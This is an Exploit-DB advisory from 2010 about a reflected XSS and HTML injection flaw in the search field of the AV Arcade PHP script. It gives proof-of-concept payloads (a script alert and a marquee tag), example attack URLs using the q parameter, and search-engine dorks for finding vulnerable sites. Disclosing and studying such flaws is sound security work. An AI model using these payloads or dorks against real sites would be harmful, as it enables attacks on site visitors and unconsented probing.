AV Arcade - 'Search' Cross-Site Scripting / HTML Injection

EDB-ID:

12519

CVE:


EDB Verified:

Author:

Vadim Toptunov

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2010-05-06

Vulnerable App: 
# Exploit Title: AV Arcade Search Field XSS/HTML Injection
# Date: 6/5/2010
# Author: Vadim Toptunov, http://www.twitter.com/pentesting
# Software Link: http://www.avscripts.net/avarcade/
# Version: 5.1.4 Free and Pro (latest) and prior
# Tested on: Any NIX
# CVE : N/a
# Code : below

Description:
AV arcade is a free arcade script from AV Scripts. It has features which easily match those of paid scripts.

POC:
Go to search field and query those strings:
HTML Injection: "><marquee>hey, this works!</marquee>
XSS: "><script>alert(String.fromCharCode(88,83,83))</script>

Example:
http://[site]/index.php?task=search&q="><marquee>hey, thisworks!</marquee>
http://[site]/index.php?task=search&q="><script>alert(String.fromCharCode(88,83,83))</script>

Dorks:
"Powered by AV Arcade v3"
"Powered by AV Arcade v4"
"Powered by AV Arcade Free Edition"
"Powered by AV Arcade Pro"
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services